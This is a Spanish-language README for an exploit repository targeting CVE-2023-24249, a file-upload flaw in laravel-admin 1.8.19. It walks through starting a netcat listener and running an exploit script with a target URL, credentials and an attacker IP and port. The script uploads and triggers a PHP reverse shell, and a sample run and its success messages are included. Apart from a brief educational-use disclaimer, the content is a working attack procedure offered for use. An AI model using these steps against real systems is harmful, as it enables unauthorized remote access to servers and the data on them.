
Script de exploit para CVE-2023-24249: una vulnerabilidad que permite la ejecución remota de código mediante la carga de archivos y la inyección de comandos.
Este repositorio contiene un script de explotación para CVE-2023-24249, una vulnerabilidad crítica encontrada en laravel-admin versión 1.8.19. Esta vulnerabilidad permite la carga arbitraria de archivos, lo que permite a los atacantes ejecutar código arbitrario mediante un archivo PHP manipulado. El exploit demuestra cómo un atacante puede subir una reverse shell a la aplicación objetivo y ejecutarla para obtener acceso remoto.
CVE-2023-24249 es una vulnerabilidad de carga arbitraria de archivos en laravel-admin v1.8.19. Esta vulnerabilidad permite a los atacantes subir y ejecutar archivos PHP arbitrarios, lo que puede conducir a una ejecución remota de código.
El script de explotación proporcionado automatiza el proceso de explotación de CVE-2023-24249. Realiza los siguientes pasos:
requestsbeautifulsoup4Instale las bibliotecas requeridas usando pip:
pip install requests beautifulsoup4
Clonar el repositorio:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
Iniciar un listener en su máquina:
nc -lvnp <PORT>
Ejecutar el script de explotación:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
Reemplace <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> y <YOUR_PORT> con los valores adecuados:
<TARGET_URL>: La URL de la aplicación objetivo.<USERNAME>: El nombre de usuario para la autenticación.<PASSWORD>: La contraseña para la autenticación.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
Si el exploit tiene éxito, el script mostrará:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
Este script está destinado únicamente a fines educativos. El uso no autorizado de este script contra cualquier sistema sin permiso explícito es ilegal y poco ético. El autor no es responsable de ningún uso indebido o daño causado por este script.
<YOUR_IP>: Su dirección IP para recibir la conexión reverse shell.<YOUR_PORT>: El puerto en el que se está ejecutando su listener.